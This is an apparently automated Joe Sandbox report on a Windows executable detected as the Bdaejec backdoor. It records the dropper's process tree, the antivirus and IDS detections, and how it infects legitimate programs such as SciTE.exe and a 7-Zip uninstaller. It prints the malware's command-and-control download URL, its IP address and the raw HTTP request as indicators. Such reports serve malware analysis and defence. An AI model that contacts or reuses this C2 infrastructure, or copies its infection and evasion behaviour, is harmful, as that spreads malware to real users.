Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ArjM1qx3hV.exe

Overview

General Information

Sample name:ArjM1qx3hV.exe
renamed because original name is a hash value
Original sample name:2024-12-28_3840cfa13afb95c493fc98d766946229.exe
Analysis ID:1581655
MD5:3840cfa13afb95c493fc98d766946229
SHA1:745322beeaaf28197f3949b5ee30929f827177e1
SHA256:4feaa17c9b4a297a1fd51843a7f514d99c749a19bf46ab2968b48c6ccbd1d327
Tags:backdoorexeuser-zhuzhu0009
Infos:

Detection

Bdaejec
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Bdaejec
AI detected suspicious sample
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Sigma detected: Use Short Name Path in Command Line
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)

Classification

  • System is w10x64
  • ArjM1qx3hV.exe (PID: 3812 cmdline: "C:\Users\user\Desktop\ArjM1qx3hV.exe" MD5: 3840CFA13AFB95C493FC98D766946229)
    • conhost.exe (PID: 7012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • lhwmJX.exe (PID: 6052 cmdline: C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe MD5: 56B2C3810DBA2E939A8BB9FA36D3CF96)
      • WerFault.exe (PID: 6116 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6052 -s 1520 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: lhwmJX.exe PID: 6052JoeSecurity_BdaejecYara detected BdaejecJoe Security

    System Summary

    barindex
    Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe, CommandLine: C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\lhwmJX.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\lhwmJX.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\lhwmJX.exe, ParentCommandLine: "C:\Users\user\Desktop\ArjM1qx3hV.exe", ParentImage: C:\Users\user\Desktop\ArjM1qx3hV.exe, ParentProcessId: 3812, ParentProcessName: ArjM1qx3hV.exe, ProcessCommandLine: C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe, ProcessId: 6052, ProcessName: lhwmJX.exe
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-28T12:25:59.786722+010028079081Malware Command and Control Activity Detected192.168.2.74969944.221.84.105799TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-28T12:25:58.540130+010028385221Malware Command and Control Activity Detected192.168.2.7650671.1.1.153UDP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: ArjM1qx3hV.exeAvira: detected
    Source: http://ddos.dnsnb8.net:799/cj//k1.raroC:Avira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k1.rarcdpAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k1.rarsAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k1.rarAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k1.rarpAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k1.rarmAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k1.rarfAvira URL Cloud: Label: malware
    Source: C:\Program Files\7-Zip\Uninstall.exeAvira: detection malicious, Label: W32/Jadtre.B
    Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeAvira: detection malicious, Label: W32/Jadtre.B
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeAvira: detection malicious, Label: TR/Dldr.Small.Z.haljq
    Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Jadtre.B
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeReversingLabs: Detection: 97%
    Source: ArjM1qx3hV.exeVirustotal: Detection: 85%Perma Link
    Source: ArjM1qx3hV.exeReversingLabs: Detection: 94%
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Source: C:\Program Files\7-Zip\Uninstall.exeJoe Sandbox ML: detected
    Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeJoe Sandbox ML: detected
    Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
    Source: ArjM1qx3hV.exeJoe Sandbox ML: detected
    Source: ArjM1qx3hV.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr

    Spreading

    barindex
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeCode function: 2_2_00BC29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,2_2_00BC29E2
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeCode function: 2_2_00BC2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,2_2_00BC2B8C
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2838522 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup : 192.168.2.7:65067 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2807908 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin : 192.168.2.7:49699 -> 44.221.84.105:799
    Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 799
    Source: global trafficTCP traffic: 192.168.2.7:49699 -> 44.221.84.105:799
    Source: Joe Sandbox ViewIP Address: 44.221.84.105 44.221.84.105
    Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeCode function: 2_2_00BC1099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep,2_2_00BC1099
    Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
    Source: global trafficDNS traffic detected: DNS query: ddos.dnsnb8.net
    Source: lhwmJX.exe, 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmp, lhwmJX.exe, 00000002.00000003.1232301842.00000000008B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
    Source: lhwmJX.exe, 00000002.00000002.1583940679.000000000050C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
    Source: lhwmJX.exe, 00000002.00000002.1583940679.000000000048E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarcdp
    Source: lhwmJX.exe, 00000002.00000003.1253042614.000000000050C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarf
    Source: lhwmJX.exe, 00000002.00000003.1253042614.000000000050C000.00000004.00000020.00020000.00000000.sdmp, lhwmJX.exe, 00000002.00000002.1583940679.000000000050C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarm
    Source: lhwmJX.exe, 00000002.00000002.1583940679.0000000000516000.00000004.00000020.00020000.00000000.sdmp, lhwmJX.exe, 00000002.00000003.1253042614.0000000000516000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.raroC:
    Source: lhwmJX.exe, 00000002.00000002.1584584545.000000000226A000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarp
    Source: lhwmJX.exe, 00000002.00000003.1253042614.000000000050C000.00000004.00000020.00020000.00000000.sdmp, lhwmJX.exe, 00000002.00000002.1583940679.000000000050C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rars
    Source: Amcache.hve.2.drString found in binary or memory: http://upx.sf.net
    Source: SciTE.exe.2.drString found in binary or memory: http://www.activestate.com
    Source: SciTE.exe.2.drString found in binary or memory: http://www.activestate.comHolger
    Source: SciTE.exe.2.drString found in binary or memory: http://www.baanboard.com
    Source: SciTE.exe.2.drString found in binary or memory: http://www.baanboard.comBrendon
    Source: SciTE.exe.2.drString found in binary or memory: http://www.develop.com
    Source: SciTE.exe.2.drString found in binary or memory: http://www.develop.comDeepak
    Source: SciTE.exe.2.drString found in binary or memory: http://www.lua.org
    Source: SciTE.exe.2.drString found in binary or memory: http://www.rftp.com
    Source: SciTE.exe.2.drString found in binary or memory: http://www.rftp.comJosiah
    Source: SciTE.exe.2.drString found in binary or memory: http://www.scintilla.org
    Source: SciTE.exe.2.drString found in binary or memory: http://www.scintilla.org/scite.rng
    Source: SciTE.exe.2.drString found in binary or memory: http://www.spaceblue.com
    Source: SciTE.exe.2.drString found in binary or memory: http://www.spaceblue.comMathias
    Source: lhwmJX.exe, 00000002.00000003.1253042614.000000000050C000.00000004.00000020.00020000.00000000.sdmp, lhwmJX.exe, 00000002.00000002.1583940679.000000000050C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
    Source: SciTE.exe.2.drString found in binary or memory: https://www.smartsharesystems.com/
    Source: SciTE.exe.2.drString found in binary or memory: https://www.smartsharesystems.com/Morten
    Source: SciTE.exe.2.drBinary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \memstr_fb8b9c81-4

    System Summary

    barindex
    Source: MyProg.exe.2.drStatic PE information: section name: Y|uR
    Source: lhwmJX.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    Source: C:\Users\user\Desktop\ArjM1qx3hV.exeCode function: 0_2_004072900_2_00407290
    Source: C:\Users\user\Desktop\ArjM1qx3hV.exeCode function: 0_2_00417B710_2_00417B71
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeCode function: 2_2_00BC60762_2_00BC6076
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeCode function: 2_2_00BC6D002_2_00BC6D00
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\lhwmJX.exe 4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
    Source: C:\Users\user\Desktop\ArjM1qx3hV.exeCode function: String function: 00403770 appears 32 times
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6052 -s 1520
    Source: MyProg.exe.2.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
    Source: ArjM1qx3hV.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: lhwmJX.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    Source: lhwmJX.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    Source: lhwmJX.exe.0.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
    Source: classification engineClassification label: mal100.spre.troj.evad.winEXE@6/12@1/1
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeCode function: 2_2_00BC119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,2_2_00BC119F
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\k1[1].rarJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6052
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7012:120:WilError_03
    Source: C:\Users\user\Desktop\ArjM1qx3hV.exeFile created: C:\Users\user~1\AppData\Local\Temp\lhwmJX.exeJump to behavior
    Source: C:\Users\user\Desktop\ArjM1qx3hV.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: ArjM1qx3hV.exeVirustotal: Detection: 85%
    Source: ArjM1qx3hV.exeReversingLabs: Detection: 94%
    Source: unknownProcess created: C:\Users\user\Desktop\ArjM1qx3hV.exe "C:\Users\user\Desktop\ArjM1qx3hV.exe"
    Source: C:\Users\user\Desktop\ArjM1qx3hV.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\ArjM1qx3hV.exeProcess created: C:\Users\user\AppData\Local\Temp\lhwmJX.exe C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6052 -s 1520
    Source: C:\Users\user\Desktop\ArjM1qx3hV.exeProcess created: C:\Users\user\AppData\Local\Temp\lhwmJX.exe C:\Users\user~1\AppData\Local\Temp\lhwmJX.exeJump to behavior
    Source: C:\Users\user\Desktop\ArjM1qx3hV.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeSection loaded: ntvdm64.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
    Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr

    Data Obfuscation

    barindex
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeUnpacked PE file: 2.2.lhwmJX.exe.bc0000.1.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
    Source: C:\Users\user\Desktop\ArjM1qx3hV.exeCode function: 0_2_00409577 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_00409577
    Source: initial sampleStatic PE information: section where entry point is pointing to: ltu
    Source: ArjM1qx3hV.exeStatic PE information: section name: ltu
    Source: lhwmJX.exe.0.drStatic PE information: section name: .aspack
    Source: lhwmJX.exe.0.drStatic PE information: section name: .adata
    Source: Uninstall.exe.2.drStatic PE information: section name: EpNuZ
    Source: MyProg.exe.2.drStatic PE information: section name: PELIB
    Source: MyProg.exe.2.drStatic PE information: section name: Y|uR
    Source: SciTE.exe.2.drStatic PE information: section name: u
    Source: C:\Users\user\Desktop\ArjM1qx3hV.exeCode function: 0_2_00416E7B push ebp; ret 0_2_00416E7E
    Source: C:\Users\user\Desktop\ArjM1qx3hV.exeCode function: 0_2_00416E85 push 00000000h; ret 0_2_00417296
    Source: C:\Users\user\Desktop\ArjM1qx3hV.exeCode function: 0_2_004037B5 push ecx; ret 0_2_004037C8
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeCode function: 2_2_00BC1638 push dword ptr [00BC3084h]; ret 2_2_00BC170E
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeCode function: 2_2_00BC2D9B push ecx; ret 2_2_00BC2DAB
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeCode function: 2_2_00BC6014 push 00BC14E1h; ret 2_2_00BC6425
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeCode function: 2_2_00BC600A push ebp; ret 2_2_00BC600D
    Source: ArjM1qx3hV.exeStatic PE information: section name: ltu entropy: 6.933946275224043
    Source: lhwmJX.exe.0.drStatic PE information: section name: .text entropy: 7.81169422100848
    Source: Uninstall.exe.2.drStatic PE information: section name: EpNuZ entropy: 6.93450886047203
    Source: MyProg.exe.2.drStatic PE information: section name: Y|uR entropy: 6.93438963759742
    Source: SciTE.exe.2.drStatic PE information: section name: u entropy: 6.934228914959314

    Persistence and Installation Behavior

    barindex
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
    Source: C:\Users\user\Desktop\ArjM1qx3hV.exeFile created: C:\Users\user\AppData\Local\Temp\lhwmJX.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeFile created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 799
    Source: C:\Users\user\Desktop\ArjM1qx3hV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\ArjM1qx3hV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\ArjM1qx3hV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
